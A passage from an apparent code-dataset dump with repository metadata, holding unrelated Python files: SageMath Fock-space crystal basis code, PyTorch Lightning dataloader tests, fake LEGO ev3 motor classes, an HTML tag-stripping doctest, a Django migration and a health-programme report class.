sage: F(G[4,1])
|4, 1> + q*|3, 2>
sage: F(G[4,2,2])
|4, 2, 2> + q*|3, 2, 2, 1>
We check against the tables in [LLT1996]_ (after truncating)::
sage: FS = FockSpace(3, truncated=3)
sage: F = FS.natural()
sage: G = FS.G()
sage: F(G[10])
|10> + q*|8, 2> + q*|7, 2, 1>
sage: F(G[6,4])
|6, 4> + q*|6, 2, 2> + q^2*|4, 4, 2>
sage: F(G[5,5])
|5, 5> + q*|4, 3, 3>
sage: FS = FockSpace(4, truncated=3)
sage: F = FS.natural()
sage: G = FS.G()
sage: F(G[3,3,1])
|3, 3, 1>
sage: F(G[3,2,2])
|3, 2, 2>
sage: F(G[7])
|7> + q*|3, 3, 1>
"""
def __init__(self, F):
r"""
Initialize ``self``.
EXAMPLES::
sage: G = FockSpace(2, truncated=3).G()
sage: TestSuite(G).run()
sage: G = FockSpace(4, truncated=3).G()
sage: TestSuite(G).run()
"""
self._basis_name = "lower global crystal"
indices = RegularPartitions_truncated(F._n, F._k)
CombinatorialFreeModule.__init__(self, F.base_ring(), indices,
prefix='G', bracket=False,
sorting_reverse=True,
category=FockSpaceBases(F))
self.module_morphism(self._G_to_fock_basis,
triangular='upper', unitriangular=True,
codomain=F.natural()).register_as_coercion()
options = FockSpaceOptions
@cached_method
def _G_to_fock_basis(self, la, algorithm='GW'):
r"""
Return the `G` basis indexed by ``la`` in the natural basis.
EXAMPLES::
sage: G = FockSpace(3, truncated=3).G()
sage: G._G_to_fock_basis(Partition([3]))
|3> + q*|2, 1>
sage: G._G_to_fock_basis(Partition([2,1]))
|2, 1> + q*|1, 1, 1>
sage: G._G_to_fock_basis(Partition([2,1]), 'LLT')
|2, 1> + q*|1, 1, 1>
"""
fock = self.realization_of().natural()
# Special cases:
# For the empty partition
if la.size() == 0:
return fock.highest_weight_vector()
# For length k partitions
if algorithm == 'GW':
n = self.realization_of()._n
k = self.realization_of()._k
if len(la) == k:
x = la[-1]
mu = _Partitions([p - x for p in la])
def add_cols(nu):
return _Partitions([ v + x for v in list(nu) + [0]*(k - len(nu)) ])
return fock.sum_of_terms((add_cols(nu), c) for nu,c in self._G_to_fock_basis(mu))
# For critical partitions
n = self.realization_of()._n
if len(la) == k-1 and all((la[i] - la[i+1] + 1) % n == 0 for i in range(k-2)) \
and (la[-1] + 1) % n == 0:
return fock.monomial(la)
# Perform the triangular reduction
cur = self.realization_of().A(algorithm)._A_to_fock_basis(la)
s = cur.support()
s.sort() # Sort lex, which respects dominance order
s.pop() # Remove the largest
q = self.realization_of()._q
while s:
mu = s.pop()
d = cur[mu].denominator()
k = d.degree()
n = cur[mu].numerator()
if k != 0 or n.constant_coefficient() != 0:
gamma = sum(n[i] * (q**(i-k) + q**(k-i))
for i in range(min(n.degree(), k)))
gamma += n[k]
cur -= gamma * self._G_to_fock_basis(mu, algorithm)
# Add any new support elements
for x in cur.support():
if x == mu or not mu.dominates(x): # Add only things (strictly) dominated by mu
continue
for i in reversed(range(len(s))):
if not s[i].dominates(x):
s.insert(i+1, x)
break
return cur
lower_global_crystal = G
canonical = G
| 37.229242
| 106
| 0.416764
|
3c5f3d3b80dab47d9968eed116110e46d7052223
| 12,460
|
py
|
Python
|
tests/trainer/test_data_loading.py
|
eladsegal/pytorch-lightning
|
7b4df7bf919acfd7f7b39d780faeadb54aec9ade
|
[
"Apache-2.0"
] | 3
|
2021-10-04T05:08:28.000Z
|
2021-10-04T06:04:06.000Z
|
tests/trainer/test_data_loading.py
|
Programmer-RD-AI/pytorch-lightning
|
02a675241c826d7720c7e15d6fda3f5da0b28116
|
[
"Apache-2.0"
] | null | null | null |
tests/trainer/test_data_loading.py
|
Programmer-RD-AI/pytorch-lightning
|
02a675241c826d7720c7e15d6fda3f5da0b28116
|
[
"Apache-2.0"
] | null | null | null |
# Copyright The PyTorch Lightning team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
from re import escape
import pytest
from torch.utils.data import DataLoader, DistributedSampler
from torch.utils.data.sampler import BatchSampler, Sampler, SequentialSampler
from pytorch_lightning import Trainer
from pytorch_lightning.utilities.exceptions import MisconfigurationException
from pytorch_lightning.utilities.imports import _TORCH_GREATER_EQUAL_1_7
from tests.helpers import BoringModel, RandomDataset
@pytest.mark.skipif(
sys.platform == "win32" and not _TORCH_GREATER_EQUAL_1_7, reason="Bad `torch.distributed` support on Windows"
)
@pytest.mark.parametrize("mode", (1, 2, 3))
def test_replace_distributed_sampler(tmpdir, mode):
class IndexedRandomDataset(RandomDataset):
def __getitem__(self, index):
return self.data[index]
class CustomDataLoader(DataLoader):
def __init__(self, num_features, dataset, *args, **kwargs):
self.num_features = num_features
super().__init__(dataset, *args, **kwargs)
class FailureCustomDataLoader(DataLoader):
def __init__(self, num_features, dataset, *args, **kwargs):
super().__init__(dataset, *args, **kwargs)
class CustomBatchSampler(BatchSampler):
pass
class TestModel(BoringModel):
def __init__(self, numbers_test_dataloaders, mode):
super().__init__()
self._numbers_test_dataloaders = numbers_test_dataloaders
self._mode = mode
def test_step(self, batch, batch_idx, dataloader_idx=None):
return super().test_step(batch, batch_idx)
def on_test_start(self) -> None:
dataloader = self.trainer.test_dataloaders[0]
assert isinstance(dataloader, CustomDataLoader)
batch_sampler = dataloader.batch_sampler
if self._mode == 2:
assert isinstance(batch_sampler, CustomBatchSampler)
# the batch_size is set on the batch sampler
assert dataloader.batch_size is None
elif self._mode == 3:
assert type(batch_sampler) is BatchSampler
assert dataloader.batch_size == self._mode
assert batch_sampler.batch_size == self._mode
assert batch_sampler.drop_last
# the sampler has been replaced
assert isinstance(batch_sampler.sampler, DistributedSampler)
def create_dataset(self):
dataset = IndexedRandomDataset(32, 64)
if self._mode == 1:
# this case will raise an error
return FailureCustomDataLoader(32, dataset)
if self._mode == 2:
# with a custom batch sampler
batch_sampler = CustomBatchSampler(SequentialSampler(dataset), batch_size=2, drop_last=True)
return CustomDataLoader(32, dataset, batch_sampler=batch_sampler)
elif self._mode == 3:
# with no batch sampler provided
return CustomDataLoader(32, dataset, batch_size=3, drop_last=True)
def test_dataloader(self):
return [self.create_dataset()] * self._numbers_test_dataloaders
model = TestModel(2, mode)
model.test_epoch_end = None
trainer = Trainer(
default_root_dir=tmpdir, limit_test_batches=2, plugins="ddp_find_unused_parameters_false", num_processes=1
)
if mode == 1:
match = escape("missing attributes are ['num_features']")
with pytest.raises(MisconfigurationException, match=match):
trainer.test(model)
else:
trainer.test(model)
@pytest.mark.parametrize("num_workers", [0, 1])
def test_dataloader_warnings(num_workers):
class TestModel(BoringModel):
def on_train_start(self, *_) -> None:
raise SystemExit()
dl = DataLoader(RandomDataset(32, 64), num_workers=num_workers)
if hasattr(dl, "persistent_workers"):
if num_workers == 0:
warn_str = "Consider setting num_workers>0 and persistent_workers=True"
else:
warn_str = "Consider setting persistent_workers=True"
else:
warn_str = "Consider setting accelerator=ddp"
trainer = Trainer(accelerator="ddp_spawn")
with pytest.warns(UserWarning, match=warn_str), pytest.raises(SystemExit):
trainer.fit(TestModel(), dl)
def test_update_dataloader_raises():
trainer = Trainer()
with pytest.raises(ValueError, match="needs to subclass `torch.utils.data.DataLoader"):
trainer._update_dataloader(object(), object(), mode="fit")
def test_dataloaders_with_missing_keyword_arguments():
trainer = Trainer()
ds = RandomDataset(10, 20)
class TestDataLoader(DataLoader):
def __init__(self, dataset):
super().__init__(dataset)
loader = TestDataLoader(ds)
sampler = SequentialSampler(ds)
match = escape("missing arguments are ['batch_sampler', 'sampler', 'shuffle']")
with pytest.raises(MisconfigurationException, match=match):
trainer._update_dataloader(loader, sampler, mode="fit")
match = escape("missing arguments are ['batch_sampler', 'batch_size', 'drop_last', 'sampler', 'shuffle']")
with pytest.raises(MisconfigurationException, match=match):
trainer._update_dataloader(loader, sampler, mode="predict")
class TestDataLoader(DataLoader):
def __init__(self, dataset, *args, **kwargs):
super().__init__(dataset)
loader = TestDataLoader(ds)
sampler = SequentialSampler(ds)
trainer._update_dataloader(loader, sampler, mode="fit")
trainer._update_dataloader(loader, sampler, mode="predict")
class TestDataLoader(DataLoader):
def __init__(self, *foo, **bar):
super().__init__(*foo, **bar)
loader = TestDataLoader(ds)
sampler = SequentialSampler(ds)
trainer._update_dataloader(loader, sampler, mode="fit")
trainer._update_dataloader(loader, sampler, mode="predict")
class TestDataLoader(DataLoader):
def __init__(self, num_feat, dataset, *args, shuffle=False):
self.num_feat = num_feat
super().__init__(dataset)
loader = TestDataLoader(1, ds)
sampler = SequentialSampler(ds)
match = escape("missing arguments are ['batch_sampler', 'sampler']")
with pytest.raises(MisconfigurationException, match=match):
trainer._update_dataloader(loader, sampler, mode="fit")
match = escape("missing arguments are ['batch_sampler', 'batch_size', 'drop_last', 'sampler']")
with pytest.raises(MisconfigurationException, match=match):
trainer._update_dataloader(loader, sampler, mode="predict")
class TestDataLoader(DataLoader):
def __init__(self, num_feat, dataset, **kwargs):
self.feat_num = num_feat
super().__init__(dataset)
loader = TestDataLoader(1, ds)
sampler = SequentialSampler(ds)
match = escape("missing attributes are ['num_feat']")
with pytest.raises(MisconfigurationException, match=match):
trainer._update_dataloader(loader, sampler, mode="fit")
match = escape("missing attributes are ['num_feat']")
with pytest.raises(MisconfigurationException, match=match):
trainer._update_dataloader(loader, sampler, mode="predict")
def test_update_dataloader_with_multiprocessing_context():
"""This test verifies that replace_sampler conserves multiprocessing context."""
train = RandomDataset(32, 64)
context = "spawn"
train = DataLoader(train, batch_size=32, num_workers=2, multiprocessing_context=context, shuffle=True)
trainer = Trainer()
new_data_loader = trainer._update_dataloader(train, SequentialSampler(train.dataset))
assert new_data_loader.multiprocessing_context == train.multiprocessing_context
def test_dataloader_reinit_for_subclass():
class CustomDataLoader(DataLoader):
def __init__(
self,
dataset,
batch_size=1,
shuffle=False,
sampler=None,
batch_sampler=None,
num_workers=0,
collate_fn=None,
pin_memory=False,
drop_last=False,
timeout=0,
worker_init_fn=None,
dummy_kwarg=None,
):
super().__init__(
dataset,
batch_size,
shuffle,
sampler,
batch_sampler,
num_workers,
collate_fn,
pin_memory,
drop_last,
timeout,
worker_init_fn,
)
self.dummy_kwarg = dummy_kwarg
self.something_unrelated = 1
trainer = Trainer(num_processes=2, strategy="ddp_spawn")
class CustomDummyObj:
sampler = None
result = trainer.prepare_dataloader(CustomDummyObj(), shuffle=True)
assert isinstance(result, CustomDummyObj), "Wrongly reinstantiated data loader"
dataset = list(range(10))
result = trainer.prepare_dataloader(CustomDataLoader(dataset), shuffle=True)
assert isinstance(result, DataLoader)
assert isinstance(result, CustomDataLoader)
assert result.dummy_kwarg is None
# Shuffled DataLoader should also work
result = trainer.prepare_dataloader(CustomDataLoader(dataset, shuffle=True), shuffle=True)
assert isinstance(result, DataLoader)
assert isinstance(result, CustomDataLoader)
assert result.dummy_kwarg is None
class CustomSampler(Sampler):
pass
# Should raise an error if existing sampler is being replaced
dataloader = CustomDataLoader(dataset, sampler=CustomSampler(dataset))
with pytest.raises(MisconfigurationException, match="will be replaced by `DistributedSampler`"):
trainer.prepare_dataloader(dataloader, shuffle=True)
def test_loader_detaching():
"""Checks that the loader has been resetted after the entrypoint."""
class LoaderTestModel(BoringModel):
def training_step(self, batch, batch_idx):
assert len(self.trainer.train_dataloader.loaders) == 10
return super().training_step(batch, batch_idx)
def validation_step(self, batch, batch_idx):
assert len(self.trainer.val_dataloaders[0]) == 10
return super().validation_step(batch, batch_idx)
def test_step(self, batch, batch_idx):
assert len(self.trainer.test_dataloaders[0]) == 10
return super().test_step(batch, batch_idx)
def predict_step(self, batch, batch_idx, dataloader_idx=None):
assert len(self.trainer.predict_dataloaders[0]) == 10
return super().predict_step(batch, batch_idx, dataloader_idx=dataloader_idx)
loader = DataLoader(RandomDataset(32, 10), batch_size=1)
model = LoaderTestModel()
assert len(model.train_dataloader()) == 64
assert len(model.val_dataloader()) == 64
assert len(model.predict_dataloader()) == 64
assert len(model.test_dataloader()) == 64
trainer = Trainer(fast_dev_run=1)
trainer.fit(model, loader, loader)
assert len(model.train_dataloader()) == 64
assert len(model.val_dataloader()) == 64
assert len(model.predict_dataloader()) == 64
assert len(model.test_dataloader()) == 64
trainer.validate(model, loader)
assert len(model.train_dataloader()) == 64
assert len(model.val_dataloader()) == 64
assert len(model.predict_dataloader()) == 64
assert len(model.test_dataloader()) == 64
trainer.predict(model, loader)
assert len(model.train_dataloader()) == 64
assert len(model.val_dataloader()) == 64
assert len(model.predict_dataloader()) == 64
assert len(model.test_dataloader()) == 64
trainer.test(model, loader)
assert len(model.train_dataloader()) == 64
assert len(model.val_dataloader()) == 64
assert len(model.predict_dataloader()) == 64
assert len(model.test_dataloader()) == 64
| 38.695652
| 114
| 0.678652
|
d44109f3ff116788da5c2cbec9515e2c0771d9e4
| 2,233
|
py
|
Python
|
code/internal/fake_ev3.py
|
TheVinhLuong102/LEGO-Mindstorms-Dalek
|
9e341e5b94e81e9220d1229402b661fbf4d4b3f8
|
[
"MIT"
] | 1
|
2021-05-15T20:46:38.000Z
|
2021-05-15T20:46:38.000Z
|
code/internal/fake_ev3.py
|
calliecameron/lego-mindstorms-dalek
|
9e341e5b94e81e9220d1229402b661fbf4d4b3f8
|
[
"MIT"
] | 1
|
2017-01-25T11:09:33.000Z
|
2017-02-13T07:04:32.000Z
|
code/internal/fake_ev3.py
|
calliecameron/lego-mindstorms-dalek
|
9e341e5b94e81e9220d1229402b661fbf4d4b3f8
|
[
"MIT"
] | 1
|
2020-06-25T20:42:59.000Z
|
2020-06-25T20:42:59.000Z
|
"""Fake versions of some ev3dev classes, so the networking code can be tested
without having the real ev3 to hand."""
import time
import subprocess
class Motor(object):
def __init__(self, port, mtype):
super(Motor, self).__init__()
self.port = port
self.mtype = mtype
self.speed_regulation_enabled = "off"
self.stop_command = "coast"
self.speed_sp = 0
self.position = 0
self.ramp_up_sp = 0
self.ramp_down_sp = 0
def stop(self):
self.msg("stop")
def run_forever(self):
self.msg("run_forever")
def reset(self):
self.msg("reset")
def msg(self, s):
print "[%sMotor %s] %s" % (self.mtype, self.port, s)
class LargeMotor(Motor):
def __init__(self, port):
super(LargeMotor, self).__init__(port, "Large")
class MediumMotor(Motor):
def __init__(self, port):
super(MediumMotor, self).__init__(port, "Medium")
class TouchSensor(object):
def __init__(self, port):
super(TouchSensor, self).__init__()
self.port = port
def value(self):
return 0
class PowerSupply(object):
def __init__(self):
super(PowerSupply, self).__init__()
self.measured_volts = 8
class Leds(object):
def __init__(self, port):
super(Leds, self).__init__()
time.sleep(1)
self.port = port
self.brightness = 0
self.off()
print "Created LEDs"
def get_brightness(self):
return self.brightness
def set_brightness(self, brightness):
brightness = int(brightness)
if brightness < 0:
brightness = 0
elif brightness > 100:
brightness = 100
self.brightness = brightness
print "[LEDs %s] brightness %d" % (self.port, self.brightness)
if self.brightness > 0:
subprocess.call(["xset", "led", "named", "Scroll Lock"])
else:
subprocess.call(["xset", "-led", "named", "Scroll Lock"])
def on(self):
self.set_brightness(100)
def off(self):
self.set_brightness(0)
def toggle(self):
if self.get_brightness() > 0:
self.off()
else:
self.on()
| 25.089888
| 77
| 0.586207
|
12bb92daf151e0875a987e023495027dca0419ad
| 703
|
py
|
Python
|
GDLC/tests/test_destroy_tags.py
|
ptoche/Gran-Diccionari-de-la-llengua-catalana-Kindle-Edition-
|
a31412d2a6f05a6c1a9bd9854cdd6fee8abd65f4
|
[
"BSD-3-Clause"
] | 1
|
2022-02-01T16:08:03.000Z
|
2022-02-01T16:08:03.000Z
|
GDLC/tests/test_destroy_tags.py
|
ptoche/Gran-Diccionari-de-la-llengua-catalana-Kindle-Edition-
|
a31412d2a6f05a6c1a9bd9854cdd6fee8abd65f4
|
[
"BSD-3-Clause"
] | null | null | null |
GDLC/tests/test_destroy_tags.py
|
ptoche/Gran-Diccionari-de-la-llengua-catalana-Kindle-Edition-
|
a31412d2a6f05a6c1a9bd9854cdd6fee8abd65f4
|
[
"BSD-3-Clause"
] | null | null | null |
"""
Strip tags from a BeautifulSoup object:
>>> from GDLC.GDLC import *
>>> dml = '''\
... <html>
... <head>
... <title>TITLE</title>
... <script>This text is inside an invalid tag</script>
... </head>
... <body>
... <p>This text is inside a valid tag</p><style>Invalid!</style><invalid>Invalid!</invalid>
... </body>
... </html>'''
>>> soup = BeautifulSoup(dml, features = 'lxml')
>>> print(destroy_tags(soup))
<html>
<head>
<title>TITLE</title>
</head>
<body>
<p>This text is inside a valid tag</p><invalid>Invalid!</invalid>
</body>
</html>
>>> print(destroy_tags(soup, 'invalid'))
<html>
<head>
<title>TITLE</title>
</head>
<body>
<p>This text is inside a valid tag</p></body>
</html>
"""
| 19.527778
| 94
| 0.614509
|
c7c7c0f5272b91acabc8d591f59b2e7408654e6d
| 474
|
py
|
Python
|
contact/migrations/0003_contactcaptchaformfield_hide_label.py
|
djangulo/integralpsychology.life
|
941e6c1ad1f274d7489d8ecdea5ae72f4889cc4b
|
[
"MIT"
] | null | null | null |
contact/migrations/0003_contactcaptchaformfield_hide_label.py
|
djangulo/integralpsychology.life
|
941e6c1ad1f274d7489d8ecdea5ae72f4889cc4b
|
[
"MIT"
] | null | null | null |
contact/migrations/0003_contactcaptchaformfield_hide_label.py
|
djangulo/integralpsychology.life
|
941e6c1ad1f274d7489d8ecdea5ae72f4889cc4b
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# Generated by Django 1.11.16 on 2018-10-10 15:41
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('contact', '0002_auto_20181010_1446'),
]
operations = [
migrations.AddField(
model_name='contactcaptchaformfield',
name='hide_label',
field=models.BooleanField(default=False),
),
]
| 22.571429
| 53
| 0.635021
|
5d4b1a9baeb19b38e5e01a9ae86a1e3d2dc75eb4
| 3,049
|
py
|
Python
|
custom/up_nrhm/reports/asha_facilitators_report.py
|
bglar/commcare-hq
|
972129fc26864c08c7bef07874bd2a7218550bff
|
[
"BSD-3-Clause"
] | 1
|
2017-02-10T03:14:51.000Z
|
2017-02-10T03:14:51.000Z
|
custom/up_nrhm/reports/asha_facilitators_report.py
|
bglar/commcare-hq
|
972129fc26864c08c7bef07874bd2a7218550bff
|
[
"BSD-3-Clause"
] | null | null | null |
custom/up_nrhm/reports/asha_facilitators_report.py
|
bglar/commcare-hq
|
972129fc26864c08c7bef07874bd2a7218550bff
|
[
"BSD-3-Clause"
] | null | null | null |
from corehq.apps.reports.datatables import DataTablesHeader, DataTablesColumn
from corehq.apps.reports.generic import GenericTabularReport
from corehq.apps.reports.sqlreport import DataFormatter, TableDataFormat
from corehq.apps.reports.standard import CustomProjectReport, DatespanMixin
from corehq.apps.reports.filters.dates import DatespanFilter
from custom.up_nrhm.filters import DrillDownOptionFilter
from custom.up_nrhm.sql_data import ASHAFacilitatorsData
class ASHAFacilitatorsReport(GenericTabularReport, DatespanMixin, CustomProjectReport):
fields = [DatespanFilter, DrillDownOptionFilter]
name = "ASHA Facilitators Report"
slug = "asha_facilitators_report"
show_all_rows = True
default_rows = 20
use_datatables = False
printable = True
LEFT_COLUMN_NAMES = [
"Total number of ASHAs under the Facilitator",
"Newborn visits within first day of birth in case of home deliveries",
"Set of home visits for newborn care as specified in the HBNC guidelines "
"(six visits in case of Institutional delivery and seven in case of a home delivery)",
"Attending VHNDs/Promoting immunization",
"Supporting institutional delivery",
"Management of childhood illness - especially diarrhea and pneumonia",
"Household visits with nutrition counseling",
"Fever cases seen/malaria slides made in malaria endemic area",
"Acting as DOTS provider",
"Holding or attending village/VHSNC meeting",
"Successful referral of the IUD, "
"Female sterilization or male sterilization cases and/or providing OCPs/Condoms",
"Total number of ASHAs who are functional on at least 6/10 tasks"
]
@property
def report_config(self):
return {
'domain': self.domain,
'startdate': self.datespan.startdate,
'enddate': self.datespan.enddate,
'af': self.request.GET.get('hierarchy_af'),
'count_one': 1,
'sixty_percents': 60
}
@property
def model(self):
return ASHAFacilitatorsData(config=self.report_config)
@property
def headers(self):
return DataTablesHeader(
DataTablesColumn("", sortable=False),
DataTablesColumn("Total no. of ASHAs functional"),
DataTablesColumn("Total no. of ASHAs who did not report/not known"),
DataTablesColumn("Rmarks")
)
@property
def rows(self):
no_value = dict(sort_key=0L, html=0L)
model = self.model
formatter = DataFormatter(TableDataFormat(model.columns, no_value=no_value))
rows = list(formatter.format(model.data, keys=model.keys, group_by=model.group_by))
if not rows:
return []
assert len(rows) == 1
row = [row.get('sort_key') or 0L for row in rows[0]]
all_ashas = row[0]
return [[self.LEFT_COLUMN_NAMES[idx], element, all_ashas - element if idx != 0 else '', '']
for idx, element in enumerate(row)]
| 41.202703
| 99
| 0.680551
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.